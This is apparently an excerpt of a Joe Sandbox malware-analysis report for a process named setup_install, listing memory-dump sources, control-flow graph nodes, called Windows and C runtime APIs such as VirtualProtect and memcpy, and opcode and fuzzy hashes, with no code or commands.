                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: malloc$_cexitmemcpystrlen
                                        • String ID:
                                        • API String ID: 701060287-0
                                        • Opcode ID: 98227b34ad0e73591ab3d3ee3b07df4cb8bdbde6b198b8821096eb9a0d18b09b
                                        • Instruction ID: 85f0b89e7ca14864cc7aa2894bce5cab4f8fce2c0c93d9062040cfe6b8931e53
                                        • Opcode Fuzzy Hash: 98227b34ad0e73591ab3d3ee3b07df4cb8bdbde6b198b8821096eb9a0d18b09b
                                        • Instruction Fuzzy Hash: 10312875A04345CFDB10DF65E8C0689B7E1FB48324F10497ED948AB362D738A945CF89

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 853 6494819c-649481a3 855 649481a5-649481ee VirtualProtect memcpy 853->855 856 6494816e-64948181 memcpy 853->856 857 64948186-6494818d 855->857 858 649481f0-649481f3 855->858 856->857 858->857 859 649481f5-6494821c VirtualProtect 858->859
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: ProtectVirtualmemcpy
                                        • String ID: @
                                        • API String ID: 4237922067-2766056989
                                        • Opcode ID: 005670ff57fd0ea0de7af9dadabae8a65afb39ae1ea474bce625394c7c217153
                                        • Instruction ID: a0df801b09c76da6139558fa236fcd1a2ba4dbaa73ebbe9f80ef25fb42541813
                                        • Opcode Fuzzy Hash: 005670ff57fd0ea0de7af9dadabae8a65afb39ae1ea474bce625394c7c217153
                                        • Instruction Fuzzy Hash: 6B016CB8948345AFD740EF29D58491EBBE0FB88654F508D1EF9D9D7310E234E9448F82

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 860 649482d0-649482d7 861 649482e0-6494832f call 64948b00 call 649493f0 860->861 862 649482d9 860->862 867 64948335-64948338 861->867 868 649483d1-649483d8 861->868 869 64948490 867->869 870 6494833e-64948345 867->870 873 64948495-64948499 869->873 871 649483d9 870->871 872 6494834b-64948352 870->872 875 649483de-649483e4 871->875 872->871 874 64948358-64948365 872->874 873->875 876 6494849f-649484a4 873->876 874->873 877 6494836b 874->877 875->868 880 649483e6-64948410 call 64948080 875->880 878 64948370-64948376 876->878 879 649484aa 876->879 877->878 881 64948567-64948589 call 64948030 878->881 882 6494837c-64948385 878->882 879->875 887 64948412-64948420 880->887 895 649485aa 881->895 896 6494858b-6494858e 881->896 882->868 885 64948387-649483a2 882->885 888 649484af-649484df call 64948080 885->888 889 649483a8-649483ab 885->889 891 64948432-6494843d 887->891 892 64948422 887->892 904 649484e4-649484ed 888->904 893 64948525-64948542 call 64948080 889->893 894 649483b1-649483b4 889->894 899 64948424-64948430 891->899 900 6494843f-6494845c VirtualQuery 891->900 892->868 893->904 901 649484f8-64948523 call 64948080 894->901 902 649483ba-649483cc call 64948030 894->902 903 64948590-649485a5 896->903 899->868 899->891 907 64948544-64948562 call 64948030 900->907 908 64948462-6494848b VirtualProtect 900->908 901->904 902->868 914 649485a7 903->914 904->885 910 649484f3 904->910 907->881 908->899 910->887 914->895
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 026430364d2c39662762d43eb1a4cb56f5ee8768c86e71a3b37dc47ac7a14f31
                                        • Instruction ID: f6a7e6d62b82ecbf613358e8ede63a0627467d7bc80a3cde144e7469d124f201
                                        • Opcode Fuzzy Hash: 026430364d2c39662762d43eb1a4cb56f5ee8768c86e71a3b37dc47ac7a14f31
                                        • Instruction Fuzzy Hash: 5571BB79A883108FDB08EF69E48479EBBF9FB56308F15856AE8459B314D730D840CBD2
                                        APIs
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443A0
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443D9
                                        • free.MSVCRT(?,?,00000000,00000004,64944DDE,?,?,?,?,64944E33), ref: 649448DF
                                        • fprintf.MSVCRT ref: 64944903
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Sleep$fprintffree
                                        • String ID:
                                        • API String ID: 4177453990-0
                                        • Opcode ID: 0f8f680cf1670c4b601ce226f6ef937a1a0ea7d3586276972f230eef0ff64193
                                        • Instruction ID: 4f7707face29f2bd5570212fbb51944289be26cc5e92d5fc9c7fb70f29a74edc
                                        • Opcode Fuzzy Hash: 0f8f680cf1670c4b601ce226f6ef937a1a0ea7d3586276972f230eef0ff64193
                                        • Instruction Fuzzy Hash: 6E11E1B1AC8381CFE714AF68D0C1216BBEABFA2328F15852DC99497304E730D8448F93
                                        APIs
                                        • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,649448D2,?,?,00000000,00000004,64944DDE,?,?,?), ref: 64942FC6
                                        • free.MSVCRT(?,?,?,?,?,00000000,00000000,?,649448D2,?,?,00000000,00000004,64944DDE), ref: 64942FE9
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotificationfree
                                        • String ID:
                                        • API String ID: 1312827883-0
                                        • Opcode ID: bb27001380121d7a2f50769ba6e6bffa61b32d023f17f2957943b2cc047f8ec1
                                        • Instruction ID: cd965a824dc5cfb7c5604f985122c3d899a9382dd78985044d2dd237e8dce9d3
                                        • Opcode Fuzzy Hash: bb27001380121d7a2f50769ba6e6bffa61b32d023f17f2957943b2cc047f8ec1
                                        • Instruction Fuzzy Hash: DDF0DA75A442159BEF10EFA5D8C4A8ABBB8FF142A4F0045A5ED54DB304E730D954CBE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: <sI$@
                                        • API String ID: 0-587643793
                                        • Opcode ID: a82394a4e17c0398070db6385731a91a00c211e4b698f1d31de4b8c100567f05
                                        • Instruction ID: 5bb628562ff52f380ec41ea378566bc3b127b606469abc6da8d36daa4fd3ef8f
                                        • Opcode Fuzzy Hash: a82394a4e17c0398070db6385731a91a00c211e4b698f1d31de4b8c100567f05
                                        • Instruction Fuzzy Hash: 38A195715083458FD720DF28C48476BBBE1BF85318F18487EE9859B396C379AC49CB9A
                                        APIs
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID: @
                                        • API String ID: 4206212132-2766056989
                                        • Opcode ID: 5c03e1a28fd9f9a9b2753ddf12bcadca885f571d98d795d340f012d286d827e2
                                        • Instruction ID: 8206b275c82f4b337f554e4dfcbf5417ec64c807d804c781dcb7f25f10cdaf35
                                        • Opcode Fuzzy Hash: 5c03e1a28fd9f9a9b2753ddf12bcadca885f571d98d795d340f012d286d827e2
                                        • Instruction Fuzzy Hash: EBE09B71A4C28445D7209A2481853B56BA49B43314F54647FE785771C6C33D8C8A551E
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: f7f923f6f1c2bfd5df8ad1dcee2c289ff288f95fc99e86222a58357fabbc21f8
                                        • Instruction ID: b5ddc3ac0911d3f5a4060d3e7d9b55aceccb5d4aeb8e47ff2019adff0d57ef42
                                        • Opcode Fuzzy Hash: f7f923f6f1c2bfd5df8ad1dcee2c289ff288f95fc99e86222a58357fabbc21f8
                                        • Instruction Fuzzy Hash: 34210032B082144FC714DF59D8C16A5B3F5EBC1318F19817EE9489B355C27DBC0997A9
                                        APIs
                                        • abort.MSVCRT ref: 00499631
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 29e4810561e077e0b5a2c9aa4f8069a1023e4ed6b819425b4f2eef8c9f2bcfa6
                                        • Instruction ID: 0a10dd1de590a7032342bea7d8f5ae5824155fb1de4fab0c046314440b7a937c
                                        • Opcode Fuzzy Hash: 29e4810561e077e0b5a2c9aa4f8069a1023e4ed6b819425b4f2eef8c9f2bcfa6
                                        • Instruction Fuzzy Hash: 8EB1F672E046259FC7048F68C4917A9BBE1BF45354F09817AEC59EB382C33DE9499BC4
                                        APIs
                                        • abort.MSVCRT ref: 0040F039
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 59069e251011435ec9291e001ee7b1d7df3d33ebd21d2671fe634590c5abd642
                                        • Instruction ID: bbb66e7f3a20be394f7072c3fb6fd4d3740fe3720d7d8d3395b6af0d2b7b8052
                                        • Opcode Fuzzy Hash: 59069e251011435ec9291e001ee7b1d7df3d33ebd21d2671fe634590c5abd642
                                        • Instruction Fuzzy Hash: 46316233A091118FD764AC2A64A116971D357C8374F6F0E7F9507F3380D97EAC56A189
                                        APIs
                                        • pthread_getspecific.LIBWINPTHREAD-1(?,?,?,?,?,?,?,?,?,?,00496F3F), ref: 004114AA
                                        • pthread_once.LIBWINPTHREAD-1 ref: 004114EF
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 004114FB
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00411512
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_getspecificpthread_mutex_lockpthread_mutex_unlockpthread_once
                                        • String ID:
                                        • API String ID: 3632289657-0
                                        • Opcode ID: 33e96c48d7095a5a9cd0e7ad6f4c8bd830534098fc9b7ebcb13ba4cbf6502de6
                                        • Instruction ID: 83bfdba2e1bf87fa2fc2f902711a05a6f9b0cba3c4f01d3acc29986a4f84f50a
                                        • Opcode Fuzzy Hash: 33e96c48d7095a5a9cd0e7ad6f4c8bd830534098fc9b7ebcb13ba4cbf6502de6
                                        • Instruction Fuzzy Hash: 1A516F70508705DFC710EF65C5C05AABBE5FF49748F01892ED6898B321E738E885CB9A
                                        APIs
                                        • abort.MSVCRT ref: 0040F039
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 2802d3f7ffed8754e936b01ee8e6498cff22f6939b23690c66105e2038b9400d
                                        • Instruction ID: 30e124ace15dbba61e50bb1f7dcdd6955a3dd839c3a2ddc209719e29f801fa44
                                        • Opcode Fuzzy Hash: 2802d3f7ffed8754e936b01ee8e6498cff22f6939b23690c66105e2038b9400d
                                        • Instruction Fuzzy Hash: 0B214D329082254BCB30EE2A80912B7B3A75B81354F5C093BD551737D2D23EEC1A92CE
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b80ac38c7acb1ffc6043e86f908fb127d98ca8af4417afda3da38314851e14a
                                        • Instruction ID: 1712310ff677c6e924aa56f116842d97a1bdc6b7f9c1f8319dbf33463218090c
                                        • Opcode Fuzzy Hash: 8b80ac38c7acb1ffc6043e86f908fb127d98ca8af4417afda3da38314851e14a
                                        • Instruction Fuzzy Hash: F00161729082511BE7249A26C456375AAD18B82348F04447FEAA2677C3C53DCC47925D
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
